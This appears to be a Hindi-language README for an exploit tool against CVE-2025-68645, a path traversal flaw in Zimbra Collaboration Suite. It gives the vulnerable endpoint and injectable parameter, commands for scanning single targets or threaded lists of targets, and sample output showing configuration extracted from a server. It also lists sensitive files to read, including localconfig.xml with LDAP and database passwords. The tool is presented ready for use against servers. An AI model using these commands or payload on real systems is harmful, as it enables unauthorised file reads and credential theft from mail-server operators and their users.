
Zimbra Path Traversal (CVE-2025-68645) - Zimbra Collaboration Suite में अप्रमाणित फ़ाइल पढ़ने की कमजोरी
CVE-2025-68645 एक पथ ट्रैवर्सल भेद्यता है Zimbra Collaboration Suite में जो अनधिकृत हमलावरों को सर्वर के फाइलसिस्टम से मनमानी फ़ाइलें पढ़ने की अनुमति देती है।
/h/printconversations?javax.servlet.include.servlet_path=
| प्रभाव | गंभीरता |
|---|---|
| अनधिकृत फ़ाइल पढ़ना | 🔴 उच्च |
| कॉन्फ़िगरेशन प्रकटीकरण | 🔴 उच्च |
| क्रेडेंशियल लीकेज | 🔴 उच्च |
| आंतरिक नेटवर्क मैपिंग | 🟠 मध्यम |
python CVE-2025-68645.py.py -t https://target.zimbra.com
python CVE-2025-68645.py.py -l targets.txt -o results.json --threads 20
python CVE-2025-68645.py.py -t https://target.zimbra.com -v --timeout 30
आर्गुमेंट विवरण डिफ़ॉल्ट -t, --target एकल लक्ष्य URL कोई नहीं -l, --list लक्ष्यों की सूची वाली फ़ाइल कोई नहीं -o, --output आउटपुट फ़ाइल नाम results.json --threads समवर्ती थ्रेड्स की संख्या 10 --timeout सेकंड में अनुरोध टाइमआउट 15 -v, --verbose विस्तृत आउटपुट सक्षम करें False --no-verify SSL सत्यापन अक्षम करें False --read-all सभी संवेदनशील पथ पढ़ें False
[*] स्कैन किया जा रहा है: https://target.zimbra.local [✓] असुरक्षित: https://target.zimbra.local [+] निकाला गया कॉन्फ़िगरेशन: version: 220726130125 memcached: target.local:11211 httpsPort: 8443 httpPort: 8080 [+] मिला: /WEB-INF/web.xml [+] मिला: /opt/zimbra/conf/localconfig.xml [!] संभावित क्रेडेंशियल लीक हुए /WEB-INF/web.xml में
============================================================ स्कैन पूर्ण! बीता समय: 1.02 सेकंड कुल लक्ष्य: 1 असुरक्षित: 1 असुरक्षित नहीं: 0
| पथ | उजागर जानकारी |
|---|
/WEB-INF/web.xml | सर्वलेट मैपिंग, सुरक्षा बाधाएँ |
/WEB-INF/zcs.web.xml | Zimbra-विशिष्ट कॉन्फ़िगरेशन |
/opt/zimbra/conf/localconfig.xml | LDAP क्रेडेंशियल, डेटाबेस पासवर्ड |
/opt/zimbra/conf/ldap-config.xml | LDAP सर्वर कॉन्फ़िगरेशन |
/opt/zimbra/conf/attrs/zimbra-attrs.xml | सिस्टम विशेषताएँ |
/WEB-INF/classes/logging.properties | लॉगिंग कॉन्फ़िगरेशन |